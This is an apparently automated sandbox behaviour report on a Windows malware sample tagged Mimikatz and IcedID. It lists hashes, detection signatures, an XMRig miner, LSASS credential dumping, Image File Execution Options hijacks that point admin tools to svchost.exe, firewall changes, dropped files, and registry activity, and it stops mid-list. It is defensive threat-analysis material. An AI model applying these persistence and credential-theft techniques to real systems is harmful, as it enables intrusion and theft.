Analysis
-
max time kernel
151s -
max time network
158s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
09-02-2025 07:43
Behavioral task
behavioral1
Sample
2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20250207-en
General
-
Target
2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe
-
Size
7.6MB
-
MD5
94917c3185b5a3e214d99b1fd4db0ba5
-
SHA1
0ecf5438cdedbdbcb0731badb0cb72efecea695a
-
SHA256
0a479850ed6ef9b601088a0dee4e23850fe659a3e227bbc033f75ec84c37d3dd
-
SHA512
3a2d5f2f817ca9db150adfb4c092eb93c697cb35d28f590542db08f46d4d0946cbf30a4754d266993efb4e2389fd64ddc1b9749d0676e3f1fdf976c0ff1c24a5
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3020 created 108 3020 zyztlgt.exe 16 -
Xmrig family
-
Contacts a large (20050) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/2472-180-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig behavioral1/memory/2472-185-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig behavioral1/memory/2472-203-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig behavioral1/memory/2472-230-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig behavioral1/memory/2472-249-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig behavioral1/memory/2472-251-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig behavioral1/memory/2472-262-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig behavioral1/memory/2472-266-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig behavioral1/memory/2472-289-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig behavioral1/memory/2472-292-0x000000013FC20000-0x000000013FD40000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral1/memory/2148-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/2148-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/files/0x0007000000019470-5.dat mimikatz behavioral1/memory/2888-9-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/1040-138-0x000000013F750000-0x000000013F83E000-memory.dmp mimikatz behavioral1/memory/3020-175-0x0000000002BF0000-0x0000000002D10000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts zyztlgt.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyztlgt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zyztlgt.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2448 netsh.exe 2304 netsh.exe -
Executes dropped EXE 20 IoCs
pid Process 2888 zyztlgt.exe 3020 zyztlgt.exe 1728 wpcap.exe 2376 gidqkybty.exe 1040 vfshost.exe 2004 reczeebjt.exe 2472 ugfccu.exe 2344 xohudmc.exe 2144 reczeebjt.exe 2892 aaugog.exe 2396 reczeebjt.exe 336 reczeebjt.exe 1248 reczeebjt.exe 912 reczeebjt.exe 2288 reczeebjt.exe 1728 zyztlgt.exe 1056 reczeebjt.exe 868 reczeebjt.exe 1408 ueuhitnlf.exe 1236 zyztlgt.exe -
Loads dropped DLL 26 IoCs
pid Process 1248 cmd.exe 1248 cmd.exe 2336 cmd.exe 1728 wpcap.exe 1728 wpcap.exe 1728 wpcap.exe 1728 wpcap.exe 1728 wpcap.exe 1576 cmd.exe 2376 gidqkybty.exe 2376 gidqkybty.exe 1592 cmd.exe 1592 cmd.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 3020 zyztlgt.exe 1988 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ifconfig.me 18 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F zyztlgt.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\aaugog.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\aaugog.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zyztlgt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat zyztlgt.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zyztlgt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F zyztlgt.exe -
resource yara_rule behavioral1/files/0x000500000001c737-130.dat upx behavioral1/memory/1040-135-0x000000013F750000-0x000000013F83E000-memory.dmp upx behavioral1/memory/1040-138-0x000000013F750000-0x000000013F83E000-memory.dmp upx behavioral1/files/0x000500000001c856-140.dat upx behavioral1/memory/2004-144-0x000000013F3F0000-0x000000013F44B000-memory.dmp upx behavioral1/files/0x000500000001c850-145.dat upx behavioral1/memory/3020-147-0x0000000002BF0000-0x0000000002D10000-memory.dmp upx behavioral1/memory/2472-149-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/2004-154-0x000000013F3F0000-0x000000013F44B000-memory.dmp upx behavioral1/memory/3020-173-0x0000000002670000-0x00000000026CB000-memory.dmp upx behavioral1/memory/2472-180-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/2144-183-0x000000013FA60000-0x000000013FABB000-memory.dmp upx behavioral1/memory/2472-185-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/2396-190-0x000000013FC20000-0x000000013FC7B000-memory.dmp upx behavioral1/memory/2396-193-0x000000013FC20000-0x000000013FC7B000-memory.dmp upx behavioral1/memory/336-200-0x000000013F060000-0x000000013F0BB000-memory.dmp upx behavioral1/memory/2472-203-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/336-204-0x000000013F060000-0x000000013F0BB000-memory.dmp upx behavioral1/memory/1248-210-0x000000013F2D0000-0x000000013F32B000-memory.dmp upx behavioral1/memory/1248-213-0x000000013F2D0000-0x000000013F32B000-memory.dmp upx behavioral1/memory/912-218-0x000000013F770000-0x000000013F7CB000-memory.dmp upx behavioral1/memory/912-220-0x000000013F770000-0x000000013F7CB000-memory.dmp upx behavioral1/memory/2288-225-0x000000013F3B0000-0x000000013F40B000-memory.dmp upx behavioral1/memory/2288-227-0x000000013F3B0000-0x000000013F40B000-memory.dmp upx behavioral1/memory/2472-230-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/1056-240-0x000000013F0E0000-0x000000013F13B000-memory.dmp upx behavioral1/memory/1056-241-0x000000013F0E0000-0x000000013F13B000-memory.dmp upx behavioral1/memory/868-245-0x000000013F520000-0x000000013F57B000-memory.dmp upx behavioral1/memory/868-247-0x000000013F520000-0x000000013F57B000-memory.dmp upx behavioral1/memory/2472-249-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/2472-251-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/2472-262-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/2472-266-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/2472-289-0x000000013FC20000-0x000000013FD40000-memory.dmp upx behavioral1/memory/2472-292-0x000000013FC20000-0x000000013FD40000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\helcklvge\UnattendGC\specials\schoedcl.xml zyztlgt.exe File created C:\Windows\helcklvge\cecisfuae\scan.bat zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\exma-1.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\trfo-2.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\zlib1.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\docmicfg.xml zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\vimpcsvc.exe zyztlgt.exe File created C:\Windows\sivbltti\schoedcl.xml zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\ssleay32.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\AppCapture64.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\Shellcode.ini zyztlgt.exe File created C:\Windows\ime\zyztlgt.exe zyztlgt.exe File created C:\Windows\helcklvge\cecisfuae\wpcap.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\libeay32.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\trch-1.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\schoedcl.xml zyztlgt.exe File created C:\Windows\sivbltti\docmicfg.xml zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\AppCapture32.dll zyztlgt.exe File created C:\Windows\helcklvge\Corporate\vfshost.exe zyztlgt.exe File created C:\Windows\helcklvge\cecisfuae\gidqkybty.exe zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\docmicfg.xml zyztlgt.exe File created C:\Windows\sivbltti\spoolsrv.xml zyztlgt.exe File created C:\Windows\sivbltti\vimpcsvc.xml zyztlgt.exe File created C:\Windows\helcklvge\Corporate\mimidrv.sys zyztlgt.exe File created C:\Windows\helcklvge\Corporate\mimilib.dll zyztlgt.exe File created C:\Windows\helcklvge\upbdrjv\swrpwe.exe zyztlgt.exe File created C:\Windows\helcklvge\cecisfuae\ip.txt zyztlgt.exe File opened for modification C:\Windows\helcklvge\cecisfuae\Packet.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\tucl-1.dll zyztlgt.exe File opened for modification C:\Windows\sivbltti\docmicfg.xml zyztlgt.exe File opened for modification C:\Windows\sivbltti\schoedcl.xml zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\vimpcsvc.xml zyztlgt.exe File opened for modification C:\Windows\sivbltti\vimpcsvc.xml zyztlgt.exe File opened for modification C:\Windows\helcklvge\Corporate\log.txt cmd.exe File created C:\Windows\helcklvge\UnattendGC\specials\docmicfg.exe zyztlgt.exe File created C:\Windows\helcklvge\cecisfuae\wpcap.exe zyztlgt.exe File created C:\Windows\helcklvge\cecisfuae\ueuhitnlf.exe zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\posh-0.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\svschost.exe zyztlgt.exe File opened for modification C:\Windows\helcklvge\cecisfuae\Result.txt ueuhitnlf.exe File created C:\Windows\helcklvge\UnattendGC\specials\tibe-2.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\xdvl-0.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\spoolsrv.xml zyztlgt.exe File opened for modification C:\Windows\sivbltti\svschost.xml zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\spoolsrv.exe zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\spoolsrv.xml zyztlgt.exe File created C:\Windows\helcklvge\cecisfuae\Packet.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\crli-0.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\ucl.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\svschost.xml zyztlgt.exe File created C:\Windows\sivbltti\svschost.xml zyztlgt.exe File opened for modification C:\Windows\sivbltti\spoolsrv.xml zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\cnli-1.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\coli-0.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\libxml2.dll zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\schoedcl.exe zyztlgt.exe File created C:\Windows\sivbltti\zyztlgt.exe 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\sivbltti\zyztlgt.exe 2025-02-09_94917c3185b5a3e214d99b1fd4db0ba5_hacktools_icedid_mimikatz.exe File created C:\Windows\helcklvge\UnattendGC\vimpcsvc.xml zyztlgt.exe File created C:\Windows\helcklvge\UnattendGC\specials\svschost.xml zyztlgt.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1980 sc.exe 2120 sc.exe 1948 sc.exe 2308 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aaugog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gidqkybty.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zyztlgt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 